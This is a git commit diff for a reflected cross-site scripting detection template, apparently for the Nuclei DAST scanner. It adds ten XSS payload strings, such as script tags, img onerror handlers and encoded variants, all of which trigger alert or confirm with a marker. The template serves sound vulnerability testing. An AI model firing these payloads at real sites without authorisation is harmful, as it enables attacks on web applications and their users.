Update reflected-xss.yaml

patch-4
Satya Prakash 2024-05-03 12:47:54 +05:30 committed by GitHub
parent 193435f17e
commit f9ac5caa19
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 2 deletions

View File

@ -2,7 +2,7 @@ id: reflected-xss
info:
name: Reflected Cross Site Scripting
author: pdteam
author: pdteam, 0xKayala
severity: medium
tags: xss,rxss,dast
@ -18,6 +18,16 @@ http:
payloads:
reflection:
- "'\"><{{first}}"
- "<img src=x onerror=alert({{first}})>"
- "<script>alert({{first}})</script>"
- "'><ScRiPt>alert({{first}})</sCrIpT>"
- "</script><ScRiPt>alert({{first}})</sCrIpT>"
- "</script><script>alert({{first}})</script>"
- "<body onload=alert({{first}})>"
- "<marquee><img src=x onerror=confirm({{first}})></marquee>"
- "'><img%20src=xxx:x%20\x20onerror=javascript:alert({{first}})>"
- "'\/><img%20s+src+c=x%20on+onerror+%20="alert({{first}})"\>"
- "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o"
fuzzing:
- part: query
@ -38,4 +48,4 @@ http:
part: header
words:
- "text/html"
# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950